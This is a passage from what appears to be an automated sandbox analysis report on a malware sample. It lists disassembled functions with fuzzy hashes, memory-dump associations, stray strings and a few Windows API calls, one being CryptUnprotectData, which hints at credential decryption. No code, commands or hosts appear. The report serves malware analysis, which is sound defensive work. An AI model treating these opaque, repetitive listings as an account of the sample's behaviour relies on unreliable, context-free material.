                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: f6dfcd86ce6b51969ca028367ba0bbb793c36911ca22bc7b383477394854f064
                              • Instruction ID: 4955bb0706f9a61617eedc413ffb5697c07bf0d0935493f0f9e89ad8c6319c09
                              • Opcode Fuzzy Hash: f6dfcd86ce6b51969ca028367ba0bbb793c36911ca22bc7b383477394854f064
                              • Instruction Fuzzy Hash: 8E115EB1A45218EBEB209B54DC49FADB778FB04761F1047DAE91AA32C0D7745A40CF91
                              Function 00E20C63 Relevance: 5.3, Strings: 3, Instructions: 1535COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ":/L$RSoK$c@w
                              • API String ID: 0-3352682510
                              • Opcode ID: 2755a68fdb7f262ca83064d3ec538b085464de82a68defce2ac7f66a1f3b3c71
                              • Instruction ID: ff3dc5511c9fa63a954b7ab0b004ad8b4bc4a4958fc7b4d5e344d14657f6968d
                              • Opcode Fuzzy Hash: 2755a68fdb7f262ca83064d3ec538b085464de82a68defce2ac7f66a1f3b3c71
                              • Instruction Fuzzy Hash: 38B208F350C2009FE708AE29EC8577ABBE5EF94320F16863DEAC587744EA3558058797
                              Function 00E11FBE Relevance: 4.9, Strings: 3, Instructions: 1112COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: .,_>$qiqu$6y
                              • API String ID: 0-2707623677
                              • Opcode ID: d56d56bb7894ea1980fe8314e05dcc86025e9fafcab92333645cd8b55fdf0640
                              • Instruction ID: a4a768214a5f06d68f1c95d8482d3688253f66594013bf117efa246c11304761
                              • Opcode Fuzzy Hash: d56d56bb7894ea1980fe8314e05dcc86025e9fafcab92333645cd8b55fdf0640
                              • Instruction Fuzzy Hash: CF723BF3A0C2109FD3046E2DEC8567ABBE9EF94720F1A463DEAC4C3744EA7558018796
                              Function 00A63720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(00A6E118,00000000,00000001,00A6E108,00000000), ref: 00A63758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00A637B0
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: 2c8d9aa9fd3c88f53260223d7167b3d24fefe12bd16332e95a347e956dcf9ef7
                              • Instruction ID: 3e1d1da9fc9488a59d1e04cd15f00365db2023586c087fba7e85c0c4ada9fd54
                              • Opcode Fuzzy Hash: 2c8d9aa9fd3c88f53260223d7167b3d24fefe12bd16332e95a347e956dcf9ef7
                              • Instruction Fuzzy Hash: 2E410771A00A28AFDB24DB58CC85BDBB7B4BB48302F4041D8E609A72D0D7716E86CF50
                              Function 00A59B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00A59B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00A59BA3
                              • LocalFree.KERNEL32(?), ref: 00A59BD3
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: 67384a1c97ecc82020765a6d90e2aa0e019336164284cef76ece4b4b0a67c541
                              • Instruction ID: e36a2e5d62a7f4e2d919da5557d2bfebcf89d876707d8412d72bfab9503f1acf
                              • Opcode Fuzzy Hash: 67384a1c97ecc82020765a6d90e2aa0e019336164284cef76ece4b4b0a67c541
                              • Instruction Fuzzy Hash: 0F11C9B8A00209EFDB04DF94D989AAE77B5FF88300F104599ED15AB390D770AE14CFA1
                              Function 00DC3558 Relevance: 4.0, Strings: 3, Instructions: 252COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: 8Fc=$A*E>$c-
                              • API String ID: 0-833717425
                              • Opcode ID: 71e61d11cea9b821d1a9ac0e0a42c9d81e193618e86c8048fecbc930a21611de
                              • Instruction ID: 7d62953a164d2d4b3df3fa1f8bf07a3f5a51296212fd58aec8f434953cc521c8
                              • Opcode Fuzzy Hash: 71e61d11cea9b821d1a9ac0e0a42c9d81e193618e86c8048fecbc930a21611de
                              • Instruction Fuzzy Hash: FC7148F3E092049BF3449A2EDC45366B7D7EBD4320F2B853DDA88D3784ED7998058286
                              Function 00DBBF4D Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: $o]$.ZoV$:=~
                              • API String ID: 0-3078927803
                              • Opcode ID: e4ddd00512d2f2512db682b4c48ff91dd6b84d60599381c5babee486c68db398
                              • Instruction ID: 1cbd366371adc7e2caf971887e58877f1bd128b6985d0b118285a5cabcaa5241
                              • Opcode Fuzzy Hash: e4ddd00512d2f2512db682b4c48ff91dd6b84d60599381c5babee486c68db398
                              • Instruction Fuzzy Hash: 836128F3A182045FF304AE29DC4473AB7DAEFD4720F1A893DEAC9D3744E53958058692
                              Function 00E1DB09 Relevance: 2.4, Strings: 1, Instructions: 1151COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: L-{
                              • API String ID: 0-648744963
                              • Opcode ID: 9110219ca00ba845393ba512ade4c996878b937d002dba8af257dd575fe46e35
                              • Instruction ID: b791f69c8af9dc1313e39d39b0e751ba735034992b22e45432df393c8bf27d36
                              • Opcode Fuzzy Hash: 9110219ca00ba845393ba512ade4c996878b937d002dba8af257dd575fe46e35
                              • Instruction Fuzzy Hash: B282F6B3A08304AFD3006E2DDC8566AFBE9EFD4720F1A493DEAC483744E63598458797
                              Function 00D7819F Relevance: 1.5, Strings: 1, Instructions: 241COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: syw
                              • API String ID: 0-788241261
                              • Opcode ID: 2762a8158810cf760b4e0453f95f15e08becb912e91e284016645faf8e3a9eac
                              • Instruction ID: aa09b1285d8bc81df7bdaafac4ee22f745e017103725a20efb2e4d813163495e
                              • Opcode Fuzzy Hash: 2762a8158810cf760b4e0453f95f15e08becb912e91e284016645faf8e3a9eac
                              • Instruction Fuzzy Hash: C971E4F3A083004FF704AA38EC8977A7BD2DB84320F1A453DDBC587784E9785845869A
                              Function 00DB88AB Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '}/
                              • API String ID: 0-3090730318
                              • Opcode ID: d522a7590fb91d0a7e1c50d65f9e5df15d173aa6b461712502ed7e4e34ba41a6
                              • Instruction ID: 457e2b0d642024af25d0ec302cec8e9a7ff6c0083506fd36a1aae5870c79479b
                              • Opcode Fuzzy Hash: d522a7590fb91d0a7e1c50d65f9e5df15d173aa6b461712502ed7e4e34ba41a6
                              • Instruction Fuzzy Hash: 5B5109F36081009FE740AE3DEC8577BBBEADBD4220F268A3DE5C4C7744E63998458656
                              Function 00E04941 Relevance: .2, Instructions: 219COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f0fe7fb2ee22270c998e26c894170ffea5a957785b7747251868e20c266a647d
                              • Instruction ID: f758175060ee7be9e84801ed510bd8874bec2c0b6817e5ac7ae1905196fbc966
                              • Opcode Fuzzy Hash: f0fe7fb2ee22270c998e26c894170ffea5a957785b7747251868e20c266a647d
                              • Instruction Fuzzy Hash: 3E6159F3E082145FF7046A3CDD4536A7AD6DBD4320F2A853DEA88D7784E93998058392
                              Function 00E0ED2D Relevance: .2, Instructions: 196COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 040a853bcc1e8edb93ebaa3735500c78486a36cc02929a40c06fcf7a678608a0
                              • Instruction ID: a6eacbe5d46bde103824f6a9394e8d51ebf647dcf2fff86e077e9d85fc5e315e
                              • Opcode Fuzzy Hash: 040a853bcc1e8edb93ebaa3735500c78486a36cc02929a40c06fcf7a678608a0
                              • Instruction Fuzzy Hash: 8B5115F3A181145BF304AE2DDD4533ABBCAEBD4720F1A853DD6C8D3784E93999098392
                              Function 00CF1960 Relevance: .2, Instructions: 183COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmpDownload File
